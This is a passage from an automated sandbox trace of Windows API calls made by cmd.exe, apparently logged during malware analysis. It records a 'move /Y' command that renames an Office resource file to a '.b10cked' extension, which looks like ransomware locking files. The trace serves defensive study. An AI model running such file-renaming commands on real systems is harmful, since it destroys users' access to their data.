lpBuffer=0x28f7fc, dwLength=0x1c | out: lpBuffer=0x28f7fc*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.051] VirtualQuery (in: 
lpAddress=0x190000, lpBuffer=0x28f7fc, dwLength=0x1c | out: lpBuffer=0x28f7fc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0173.051] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f7fc, dwLength=0x1c | out: lpBuffer=0x28f7fc*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0173.051] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f7fc, dwLength=0x1c | out: lpBuffer=0x28f7fc*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.051] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f7fc, dwLength=0x1c | out: lpBuffer=0x28f7fc*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0173.051] GetConsoleOutputCP () returned 0x1b5 [0173.051] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.052] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0173.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.052] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0173.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.052] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.052] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.052] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.052] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.052] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.052] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0173.052] GetEnvironmentStringsW () returned 0x370218* [0173.053] 
FreeEnvironmentStringsW (penv=0x370218) returned 1 [0173.053] GetEnvironmentStringsW () returned 0x370218* [0173.053] FreeEnvironmentStringsW (penv=0x370218) returned 1 [0173.053] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e79c | out: phkResult=0x28e79c*=0x40) returned 0x0 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x0, lpData=0x28e7a8*=0xa8, lpcbData=0x28e7a0*=0x1000) returned 0x2 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x4, lpData=0x28e7a8*=0x1, lpcbData=0x28e7a0*=0x4) returned 0x0 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x0, lpData=0x28e7a8*=0x1, lpcbData=0x28e7a0*=0x1000) returned 0x2 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x4, lpData=0x28e7a8*=0x0, lpcbData=0x28e7a0*=0x4) returned 0x0 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x4, lpData=0x28e7a8*=0x40, lpcbData=0x28e7a0*=0x4) returned 0x0 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x4, lpData=0x28e7a8*=0x40, lpcbData=0x28e7a0*=0x4) returned 0x0 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x0, 
lpData=0x28e7a8*=0x40, lpcbData=0x28e7a0*=0x1000) returned 0x2 [0173.053] RegCloseKey (hKey=0x40) returned 0x0 [0173.053] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e79c | out: phkResult=0x28e79c*=0x40) returned 0x0 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x0, lpData=0x28e7a8*=0x40, lpcbData=0x28e7a0*=0x1000) returned 0x2 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x4, lpData=0x28e7a8*=0x1, lpcbData=0x28e7a0*=0x4) returned 0x0 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x0, lpData=0x28e7a8*=0x1, lpcbData=0x28e7a0*=0x1000) returned 0x2 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x4, lpData=0x28e7a8*=0x0, lpcbData=0x28e7a0*=0x4) returned 0x0 [0173.053] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x4, lpData=0x28e7a8*=0x9, lpcbData=0x28e7a0*=0x4) returned 0x0 [0173.054] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x4, lpData=0x28e7a8*=0x9, lpcbData=0x28e7a0*=0x4) returned 0x0 [0173.054] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e7a4, lpData=0x28e7a8, lpcbData=0x28e7a0*=0x1000 | out: lpType=0x28e7a4*=0x0, lpData=0x28e7a8*=0x9, lpcbData=0x28e7a0*=0x1000) returned 0x2 [0173.054] 
RegCloseKey (hKey=0x40) returned 0x0 [0173.054] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886388 [0173.054] srand (_Seed=0x5b886388) [0173.054] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked\"" [0173.054] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked\"" [0173.054] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.054] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x371978, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0173.054] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0173.054] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0173.054] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.054] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0173.054] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0173.054] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0173.054] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0173.055] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0173.055] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0173.055] _wcsicmp (_String1="PROMPT", _String2="RANDOM") 
returned -2 [0173.055] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0173.055] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0173.055] GetEnvironmentStringsW () returned 0x372368* [0173.055] FreeEnvironmentStringsW (penv=0x372368) returned 1 [0173.055] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.055] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.055] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0173.055] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0173.055] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0173.055] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0173.055] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0173.055] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0173.055] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0173.055] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0173.055] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f568 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.055] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f568, lpFilePart=0x28f564 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f564*="Desktop") returned 0x18 [0173.055] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.055] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f2e4 | out: lpFindFileData=0x28f2e4) returned 0x3709f8 [0173.056] FindClose (in: hFindFile=0x3709f8 | out: hFindFile=0x3709f8) returned 1 [0173.056] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f2e4 | out: lpFindFileData=0x28f2e4) returned 0x3709f8 [0173.056] 
FindClose (in: hFindFile=0x3709f8 | out: hFindFile=0x3709f8) returned 1 [0173.056] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f2e4 | out: lpFindFileData=0x28f2e4) returned 0x3709f8 [0173.056] FindClose (in: hFindFile=0x3709f8 | out: hFindFile=0x3709f8) returned 1 [0173.056] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.056] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0173.056] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0173.056] GetEnvironmentStringsW () returned 0x370218* [0173.056] FreeEnvironmentStringsW (penv=0x370218) returned 1 [0173.056] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.057] GetConsoleOutputCP () returned 0x1b5 [0173.057] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.057] GetUserDefaultLCID () returned 0x409 [0173.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0173.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f6a8, cchData=128 | out: lpLCData="0") returned 2 [0173.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f6a8, cchData=128 | out: lpLCData="0") returned 2 [0173.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f6a8, cchData=128 | out: lpLCData="1") returned 2 [0173.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0173.057] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0173.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0173.058] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0173.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0173.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0173.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0173.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0173.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0173.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0173.058] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0173.059] GetConsoleTitleW (in: lpConsoleTitle=0x360938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.059] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.059] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0173.059] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0173.059] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0173.059] _wcsicmp (_String1="move", _String2=")") returned 68 [0173.060] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0173.060] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0173.060] _wcsicmp (_String1="IF", _String2="move") returned -4 [0173.060] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0173.060] _wcsicmp (_String1="REM", _String2="move") returned 5 [0173.060] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0173.063] GetConsoleTitleW (in: lpConsoleTitle=0x28f3a0, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.064] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0173.064] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0173.064] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0173.064] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0173.064] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0173.064] _wcsicmp (_String1="move", _String2="CD") returned 10 [0173.064] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0173.064] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0173.064] _wcsicmp (_String1="move", _String2="REN") returned -5 [0173.064] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0173.064] _wcsicmp (_String1="move", _String2="SET") returned -6 [0173.064] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0173.064] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0173.064] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0173.064] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0173.064] _wcsicmp (_String1="move", _String2="MD") returned 11 [0173.064] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0173.064] _wcsicmp (_String1="move", _String2="RD") returned -5 [0173.064] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0173.064] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0173.064] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0173.064] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0173.064] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0173.064] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0173.064] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0173.064] _wcsicmp (_String1="move", _String2="VER") returned -9 [0173.064] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0173.064] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0173.064] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0173.064] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0173.064] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0173.064] _wcsicmp (_String1="move", _String2="START") returned -6 [0173.064] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0173.064] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0173.064] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0173.066] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.066] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.066] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f15c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f154, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f154*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0173.066] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0173.067] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0173.067] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0173.068] _wcsicmp (_String1="PUB6IN~2.TRX", _String2=".") returned 66 [0173.068] _wcsicmp 
(_String1="PUB6IN~2.TRX", _String2="..") returned 66 [0173.068] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6in~2.trx")) returned 0x2020 [0173.068] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x371f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.068] SetErrorMode (uMode=0x0) returned 0x0 [0173.068] SetErrorMode (uMode=0x1) returned 0x0 [0173.068] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX", nBufferLength=0x104, lpBuffer=0x28eae4, lpFilePart=0x28eacc | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX", lpFilePart=0x28eacc*="PUB6IN~2.TRX") returned 0x3c [0173.068] SetErrorMode (uMode=0x0) returned 0x1 [0173.068] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0173.068] _wcsicmp (_String1="PUB6IN~2.TRX", _String2=".") returned 66 [0173.068] _wcsicmp (_String1="PUB6IN~2.TRX", _String2="..") returned 66 [0173.068] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6in~2.trx")) returned 0x2020 [0173.068] SetErrorMode (uMode=0x0) returned 0x0 [0173.068] SetErrorMode (uMode=0x1) returned 0x0 [0173.068] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX", nBufferLength=0x104, lpBuffer=0x28ef60, lpFilePart=0x28ecf8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX", lpFilePart=0x28ecf8*="PUB6IN~2.TRX") returned 0x3c [0173.068] SetErrorMode (uMode=0x0) returned 0x1 [0173.069] SetErrorMode (uMode=0x0) returned 0x0 [0173.069] SetErrorMode (uMode=0x1) returned 0x0 [0173.069] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x28f168, lpFilePart=0x28ecf8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked", lpFilePart=0x28ecf8*="PUB6INTL.REST.trx_dll.b10cked") returned 0x4d [0173.069] SetErrorMode (uMode=0x0) returned 0x1 [0173.069] SetLastError (dwErrCode=0x0) [0173.069] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\pub6intl.rest.trx_dll.b10cked")) returned 0xffffffff [0173.069] GetLastError () returned 0x2 [0173.069] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x28e674, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e674) returned 0x372138 [0173.069] FindNextFileW (in: hFindFile=0x372138, lpFindFileData=0x28e674 | out: lpFindFileData=0x28e674) returned 0 [0173.069] GetLastError () returned 0x12 [0173.070] FindClose (in: hFindFile=0x372138 | out: hFindFile=0x372138) returned 1 [0173.071] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6IN~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x371cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x371cc8) returned 0x372138 [0173.071] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x28e90c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0173.071] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PUB6INTL.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x28e90c, lpFilePart=0x0 | out: 
